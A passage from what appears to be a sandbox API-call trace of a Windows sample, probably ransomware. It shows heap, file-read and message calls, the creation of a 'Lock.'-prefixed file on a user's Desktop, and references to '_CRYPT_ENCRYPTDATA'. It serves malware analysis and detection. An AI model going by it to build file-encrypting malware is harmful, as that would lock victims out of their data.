lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.836] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0148.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0148.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0148.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0148.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0148.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0148.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0148.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0148.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0148.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0148.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0148.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0148.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0148.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0148.837] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0148.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0148.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0148.838] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.ElwQwY9lqgU4Me-0 5E.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.elwqwy9lqgu4me-0 5e.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0148.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0148.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0148.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0148.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0148.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0148.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0148.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0148.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0148.839] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.839] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.841] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.841] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.845] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0148.845] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0148.871] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x5cf0, lpOverlapped=0x0) returned 1 [0148.871] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0148.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0148.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0148.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0148.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0148.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15cf0) returned 0x2f14010 [0148.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3de6020 | out: hHeap=0x970000) returned 1 [0149.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0149.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0149.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0149.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0149.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0149.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0149.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0149.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0149.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15cf0) returned 0x2f29d08 [0149.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0149.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0149.073] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0149.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0149.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0149.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0149.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0149.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15cf0) returned 0x2f14010 [0149.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0149.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0149.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0149.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0149.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0149.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0149.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0149.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0149.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0149.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0149.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0149.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0149.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0149.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0149.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0149.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0149.077] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0149.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0149.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0149.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0149.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0149.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0149.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0149.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0149.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0149.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15cf0) returned 0x2f14010 [0149.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0149.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0149.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0149.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0149.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0149.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0149.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0149.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0149.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0149.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0149.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0149.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0149.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0149.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0149.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0149.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0149.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0149.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0149.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0149.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15cf0) returned 0x2e80330 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0149.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0149.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0149.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0149.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0149.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0149.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0149.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0149.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0149.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0149.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0149.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0149.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0149.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0149.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0149.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0149.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0149.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0149.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0149.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0149.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0149.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0149.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0149.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0149.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0149.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0149.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0149.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0149.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0149.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0149.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0149.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0149.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0149.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0149.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0149.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0149.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0149.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0149.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0149.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0149.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0149.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0149.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0149.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0149.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0149.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0149.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0149.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0149.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0149.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0149.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0149.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0149.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0149.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0149.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0149.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0149.090] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0149.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0149.090] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0149.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0149.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0149.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0149.090] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0149.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0149.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0149.090] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0149.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0149.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0149.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0149.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0149.091] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0149.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0149.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0149.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0149.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0149.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0149.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0149.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0149.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0149.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0149.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0149.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0149.091] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0149.091] 